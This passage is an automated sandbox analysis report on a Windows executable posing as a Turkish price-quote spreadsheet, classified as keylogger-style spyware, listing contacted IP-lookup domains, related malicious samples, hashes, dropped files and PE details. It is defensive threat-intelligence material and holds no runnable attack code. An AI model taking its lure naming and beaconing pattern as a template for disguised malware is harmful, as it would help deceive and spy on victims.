https://reallyfreegeoip.org	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1715367720.0000000002869000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718237504.0000000005940000.00000004.00000020.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	reallyfreegeoip.org	European Union		13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528229
Start date and time:	2024-10-07 17:09:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/6@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 125 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, PID 6308 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Simulations

Behavior and APIs

Time	Type	Description
11:09:57	API Interceptor	10478977x Sleep call for process: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe modified
11:09:58	API Interceptor	9x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/yuvr/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	http://www.thegulfthermale.com.tr/antai/12/3dsec.php	Get hash	malicious	Unknown	Browse	www.thegulfthermale.com.tr/antai/12/3dsec.php
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/MlZtCPkK/download
	https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2	Get hash	malicious	HTMLPhisher	Browse	mairie-espondeilhan.com/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/758bYd86/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
132.226.247.73	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	jHSDuYLeUl.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Urgent inquiry for quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Advice - Advice Ref pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
	#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.8.169
	#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	scan_374783.js	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04	Get hash	malicious	Unknown	Browse	104.17.223.152
	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.htr.gtdzwq?v=frudxdxrtxfilfrjx.htrd.iwtlt___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpjOGJiNWZiM2U4NjZhMDk1M2Y0MGVjY2U1MDhmYjQ4YTo3OmM4Y2I6MDdlZDdhNDI4N2UyMzc1NGJjZGQ1YjkyOWYyODg2OTI5ZDkyNzU0YTQ2NWI4MzhkYWZlMmM3NjA5ZGMyZGNmMzpoOlQ6VA#YnJhbmRvbi53YW5nQGludGVncmFjb25uZWN0LmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	8ID0109FLT24PO92CD-R.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	104.21.44.9
	shipping.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	104.21.44.9
	VML S.A..pdf	Get hash	malicious	HtmlDropper	Browse	104.18.95.41
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	104.18.70.113
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
UTMEMUS	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.8.169
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	jHSDuYLeUl.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
	#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3

Process:	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKIl9iagu:QWSU4xympjmZ9tz4RIoUl8NDv
MD5:	D65AD510DE6CBCF14D48CF96ABB89CA0
SHA1:	66666A8CFAB0B20F464B32CD635F01F5E09CB58B
SHA-256:	851B4541B099CAB4357FE9936578F9B38B018ACFD5F4B893B19B8CD981BAD2A0
SHA-512:	4DAF5F820EF9A63A55815938789DFDEAF4E5B4DE2898F2B64832FF18028915471247FAD4930998EA6BFD1734858023EFE9A33DC7BB5B50E762318010D548F5FA
Malicious:	false
Reputation:	low
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eumdg1we.agq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ib5b2pti.hig.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szrs0nhg.lhe.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdzj5ivz.twf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.974938867189363
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
File size:	539'136 bytes
MD5:	acdb58c5abad0535de184d32c04c75a5
SHA1:	7323524e5f90cbc698ce33f2bdd00e62c3694943
SHA256:	61460220761a54e3263ca427e082c7542bd531ed5c2aae397757be3cb313bb74
SHA512:	68835987cce5e15186f9aec6469a026399893856b800c8d47f497e9fb5c86d5b64432e9f45e8dffb5dcb0152ac7cbf5980386a7c94967381d80d6ced4e6461b6
SSDEEP:	12288:rQf0SXm2tHVpXss+FcNzQqIgQbM9zab12ord:rQ9Xsxi1IfKmvx
TLSH:	DEB4238853D59B51C5E30B36804352A303F86D9FB487FB7F1C946CBAA931B488359BE6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.. ...........?... ...@....@.. ....................................@................................

File Icon


Icon Hash:	4bc88e07cf8f8d8b

Static PE Info

General

Entrypoint:	0x483fe2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6703C016 [Mon Oct 7 11:03:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add eax, dword ptr [eax]
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
push eax
add byte ptr [eax], al
adc byte ptr [eax], 00000000h
add byte ptr [eax], al
push 18800000h
add byte ptr [eax], al
add byte ptr [eax+00800000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add dword ptr [eax], eax
add byte ptr [eax], al
cwde
add byte ptr [eax], al
add byte ptr [edx], 00000000h
add byte ptr [eax], al
mov al, 00h
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
enter 0000h, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
loopne 00007F3A78BE11F2h
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
clc
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x83f90	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x1494	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x82994	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

